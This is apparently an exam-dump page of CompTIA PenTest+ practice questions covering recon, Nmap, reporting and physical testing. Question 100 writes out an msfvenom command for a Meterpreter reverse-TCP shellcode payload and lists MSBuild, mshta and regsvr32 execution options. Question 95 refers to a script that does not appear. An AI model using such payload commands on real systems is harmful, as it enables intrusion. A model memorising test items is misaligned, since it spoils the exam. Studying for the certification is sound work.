Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :272 Q&As
  • Last Updated
    :Apr 02, 2025

CompTIA CompTIA Certifications PT0-003 Questions & Answers

  • Question 91:

    A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?

    A. ..nmap -sU -sV -T4 -F target.company.com

    B. ..nmap -sS -sV -F target.company.com

    C. ..nmap -sT -v -T5 target.company.com

    D. ..nmap -sX -sC target.company.com

  • Question 92:

    A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

    A. IP addresses and subdomains

    B. Zone transfers

    C. DNS forward and reverse lookups

    D. Internet search engines

    E. Externally facing open ports

    F. Shodan results

  • Question 93:

    A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

    Which of the following is the BEST way to ensure this is a true positive?

    A. Run another scanner to compare.

    B. Perform a manual test on the server.

    C. Check the results on the scanner.

    D. Look for the vulnerability online.

  • Question 94:

    Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)

    A. Use of non-optimized sort functions

    B. Poor input sanitization

    C. Null pointer dereferences

    D. Non-compliance with code style guide

    E. Use of deprecated Javadoc tags

    F. A cydomatic complexity score of 3

  • Question 95:

    A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

    Which of the following changes should the tester apply to make the script work as intended?

    A. Change line 2 to $ip= 10.192.168.254;

    B. Remove lines 3, 5, and 6.

    C. Remove line 6.

    D. Move all the lines below line 7 to the top of the script.

  • Question 96:

    A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

    A. A handheld RF spectrum analyzer

    B. A mask and personal protective equipment

    C. Caution tape for marking off insecure areas

    D. A dedicated point of contact at the client

    E. The paperwork documenting the engagement

    F. Knowledge of the building's normal business hours

  • Question 97:

    A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?

    A. Launch an external scan of netblocks.

    B. Check WHOIS and netblock records for the company.

    C. Use DNS lookups and dig to determine the external hosts.

    D. Conduct a ping sweep of the company's netblocks.

  • Question 98:

    A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

    A. BeEF

    B. John the Ripper

    C. ZAP

    D. Evilginx

  • Question 99:

    During an external penetration test, a tester receives the following output from a tool:

    test.comptia.org

    info.comptia.org

    vpn.comptia.org

    exam.comptia.org

    Which of the following commands did the tester most likely run to get these results?

    A. nslookup -type=SOA comptia.org

    B. amass enum -passive -d comptia.org

    C. nmap -Pn -sV -vv -A comptia.org

    D. shodan host comptia.org

  • Question 100:

    A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

    The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

    A. regsvr32 /s /n /u C:\evil.xml

    B. MSBuild.exe C:\evil.xml

    C. mshta.exe C:\evil.xml

    D. AppInstaller.exe C:\evil.xml

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.